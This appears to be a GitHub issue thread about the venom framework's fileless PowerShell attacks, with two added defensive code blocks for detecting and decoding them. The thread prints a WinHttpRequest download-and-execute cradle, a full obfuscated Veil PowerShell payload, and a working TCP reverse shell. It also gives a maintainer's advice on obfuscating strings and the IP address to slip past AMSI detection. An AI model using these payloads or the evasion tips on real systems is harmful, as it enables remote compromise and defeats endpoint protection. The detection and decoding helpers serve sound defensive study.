Closed Vedant-Bhalgama closed 3 years ago
venom creates a 'crandler.BAT' to download and execute 'payload.ps1' on target 'ram' ...
That means that payload.ps1 does NOT touch the target disk = fileless execution ...
The process used is cmd.exe (if we execute the crandler.BAT) <-- parent process
and then powershell.exe (used to load\execute payload.ps1 in RAM) <-- child process
ComObject WinHttpRequest
The API 'ComObject WinHttpRequest' will take care of downloading payload.ps1 into 'RAM' and 'IEX' takes care of its execution...
powershell -W 1 $proxy=new-object -com WinHttp.WinHttpRequest.5.1;$proxy.open('GET','http://<LHOST>/<PAYLOADNAME>.ps1',$false);$proxy.send();iex $proxy.responseText;
For more one-liner cradle downloaders take a look at this article
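From the detection side, an added example (not from this issue thread or from venom) that scores constructed process-creation events for the chain described above: cmd.exe spawning powershell.exe with a hidden window, a WinHttp.WinHttpRequest COM client, a remote GET and iex over the response text. Field names follow the Sysmon Event ID 1 layout and the events are constructed samples.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -W 1 $proxy=new-object -com WinHttp.WinHttpRequest.5.1;"
                    "$proxy.open('GET','http://192.0.2.10/payload.ps1',$false);"
                    "$proxy.send();iex $proxy.responseText;"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
]

# Command-line indicators of the cradle: (name, case-insensitive regex).
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    ("com_http_client", r"winhttp\.winhttprequest"),
    ("remote_fetch", r"\.open\(\s*'get'\s*,\s*'https?://"),
    ("in_memory_exec", r"\b(?:iex|invoke-expression)\b.*responsetext"),
]


def score_event(event):
    """Return (score, hit names) for one process-creation event."""
    hits = [name for name, pat in INDICATORS
            if re.search(pat, event["CommandLine"], re.IGNORECASE)]
    # Parent cmd.exe -> child powershell.exe is the crandler.BAT launch chain.
    parent = event["ParentImage"].lower()
    child = event["Image"].lower()
    if parent.endswith("\\cmd.exe") and child.endswith("\\powershell.exe"):
        hits.append("cmd_to_powershell")
    return len(hits), hits


def flag_cradles(events, threshold=3):
    """Return (event, hits) for every event reaching the indicator threshold."""
    flagged = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            flagged.append((event, hits))
    return flagged


if __name__ == "__main__":
    for event, hits in flag_cradles(EVENTS):
        print("ALERT", event["Image"], hits)
```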
Oh! Got it! Last question, I wanted to ask whether this kind of remote memory injection can be done in Python? Is there anything in venom related to that? If so, can I see the source code of it and maybe you can explain a bit about it?
Also, here is a payload generated from Veil Evasion. It's a PowerShell payload. I wanted to decode the base64 string and check what is going on, but I am not able to do so. Any help over here?
%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9s2EP7uX3EQOFRqLEV+iZdEMLDUadasdZrFTtpNMAZaom3WFKlQVGLX9X/fyZbf0i9FPwyDAUs83vG5l+eOIo/Qht+sSngpxHWSKm1sa8q0ZKJR92IhLGcAaT4UPILMUIMPNjO4D9fS3BoND1ybnIoLIVRklzKRXsSxZllWhZxLA/Fzj39l5WK01sWjlOzP0534VivDIuMEP+1LRzNqWH+Cj3jny3p9YYzmw9ywPacMjaZrz7bKKNNm6/1WfEs1TRhibY1XWBjClaDjfc012nWMYVi/VcI3c8PCwYDc9G/7msos4aZdrb1ungb7otAftP1Z7U2w1c9YpGT80uRQurUiUl1EEXrcJiMqMhb09XxBeiqaMtO+Yc/ux+EXzCzcMOOtpVn5tMN9WRn3FU24mA/OzzEoplHhWelpNfzeuigfql2OMTmH+0UtVaREqXEfp05QOuR1lJTojf0qz7xUKeFJk3pKj19Va/WGE4QPiseDjXKPydjeT9VLhTsWMf7EDnWWSK9ostjLi9E5WwZE57KvDBVtP7hS+i2NJja5ljGbAZdwUJGm73nNxsBZ7Gy2b6/rJ62jtR2eOeI6M32esLa9l+vLgokotGtnvl+t4c9f/cLNxnsu4yI1JnKcIvNdLgRfFzizw3vMfas5sHeYNd/3UbO30ghWPHV7grEU3AxO1iVH/CIt/6Oalx79YNE32uuqH7L9O6Vt5V/q7UCFypj9s2x40Ww/SogKH4H93zEBXNgxENwxgxNwlYZttA4sKqYgR4yD3rp407l8e/X7u+s/3n/o3ny8/fOu179/+PT5r7/pMIrZaDzhX6YikSp9xDPzp+fZ/KuPJWqetH49PbO8vupMqL7Qms5tpzLKZVQMQYhs8uQsQDOT4zi27RCHJI4xIE+HFvANuoxmuWab7Li9PMFY8gR+ARxmvg8ue4SzurPcnW5gQUaF91ZQ87zGt5HCGRtNXLU6AveO2kDi0B4z42K5YpWAm9AZT/BUEnsfmBybiTNYBqV/ZBTsnc5gAalWRa5gEdLC0QGZIRz+HQH5ZxkA0hFdmKH3GV5KJS4sbIlVLhd3K1zHk3glIeWWewDjBaDHYBOORCMcXGGg1cS3oyNk0wSRTECmBWCMCCwAKANEE7Gi4hT1skJhUngkAig4hjnPHKzuJuuogbDlwjp7+nxvYZjrFmX6iUfsVmFZulTSMdNIuELKdIdpw0cce4Q9UMHj1a3WoUIM8XZEzMWmWxJc7NG6N88MS7zi+E9s2BGcSRNUSOK9w/uP6dVksa08Y9pFPGmsKlhd9RW5TY+bno/+qyRFsKHAiLu967fQ8moBfMJmUM8Z3PQdC1tZIug4gM29CCQt0pB4l+pZCkVj7CFqWxNj0uz8+Lh2VvdqrVOv5tXPT/1T/5hIC5wKUWiE7rjFaEJqsGTI9CUbcclXBSKP4N7g/Q4WojfqFrgSV1lKIwYryVVZygzclGaZmei8QmZtos7PD75//CpJS7pV/VkD+xQfTR9HV5mtu1wa7FNvNWVVWtYl87pUZxMqsCgdlc5tklbBr0K4/qrA3p9hG+GiUbcdpwpbkCI0NNn/7CkmC5mtR0zRbio3rswFcubgyiiHx2mr6fvlfFz+Cw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
$Text = "This is a secret and should be hidden"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
write-Host "EncodedString: $EncodedText"
$EncodedText = "VABoAGkAcwAgAGkAcwAgAGEAIABzAGUAYwByAGUAdAAgAGEAbgBkACAAcwBoAG8AdQBsAGQAIABiAGUAIABoAGkAZABkAGUAbgA="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host "DecodedString: $DecodedText"
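The Veil one-liner above is Base64 over a .NET DeflateStream, so plain Base64 decoding alone gives compressed bytes. An added analysis helper (not from this thread or from venom) that extracts the FromBase64String argument from such a command line, Base64-decodes it and inflates the raw DEFLATE stream; the sample command line is constructed inside the block, and the page's real blob is not decoded here.

```python
import base64
import re
import zlib


def extract_base64(cmdline):
    """Pull the Base64 argument out of [Convert]::FromBase64String(\"...\")."""
    m = re.search(r'FromBase64String\(\\?"([A-Za-z0-9+/=]+)\\?"\)', cmdline)
    if not m:
        raise ValueError("no FromBase64String(...) argument found")
    return m.group(1)


def inflate_script(b64):
    """Reverse the wrapper: Base64 -> raw DEFLATE -> ASCII text.
    .NET DeflateStream emits raw DEFLATE without a zlib header, so wbits=-15."""
    raw = base64.b64decode(b64)
    return zlib.decompress(raw, -15).decode("ascii")


def decode_cmdline(cmdline):
    """Recover the plaintext script embedded in a Veil-style command line."""
    return inflate_script(extract_base64(cmdline))


def build_sample_cmdline(script):
    """Constructed test input: wrap a script the same way the one-liner does
    (raw DEFLATE, then Base64) so the decoder can be exercised offline."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(co.compress(script.encode("ascii")) + co.flush()).decode()
    return ('powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command '
            '"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object '
            'IO.Compression.DeflateStream ($(New-Object IO.MemoryStream '
            '(,$([Convert]::FromBase64String(\\"' + blob + '\\")))), '
            '[IO.Compression.CompressionMode]::Decompress)), '
            '[Text.Encoding]::ASCII)).ReadToEnd();"')


# Constructed stage text; not the contents of the Veil payload from the issue.
SAMPLE_SCRIPT = "Write-Host 'constructed sample, not the real Veil stage'"

if __name__ == "__main__":
    print(decode_cmdline(build_sample_cmdline(SAMPLE_SCRIPT)))
```

To inspect a real command line, paste it into decode_cmdline() unchanged; the regex accepts both the escaped \" form seen in the issue and plain quotes.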
Thanks for the help. I noticed that the main fileless PowerShell reverse shell code uses this kind of code:
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
I wonder why it is not getting detected? Because when I try Invoke-Obfuscation on this reverse shell code, it gets detected by AMSI https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
Yes, it's detected by AMSI ...
NOTES:
"10.10.10.10",80
and $sendback + "PS " + (pwd).Path + "> "
strings are being flagged for sure!
Also, using Invoke-Obfuscation
(by @danielbohannon) it flags detection also
(it's a project created to help BLUE TEAMS to fight obfuscation techniques), so manual obfuscation is the key these days!
Change the following cmdline
$sendback2 = $sendback + "PS " + (pwd).Path + "> "
with this one and try it again!
$sendback2 = $sendback + "PS Prompt > "
Remember to obfuscate Net.Sockets.TCPClient("10.10.10.10",80)
<-- IP address also!
$myObfuscation = "10."+"10.10"+".10" -Join ''; blabblabla ; Net.Sockets.TCPClient("$myObfuscation",80)
Read this article about obfuscation as a method to bypass AMSI string detection!
Alright! Thank you for your help sir!
Hi, nice framework, really useful for Red Teaming purposes. Had a question... Are the fileless attacks getting injected into a remote process? If so, can I know how?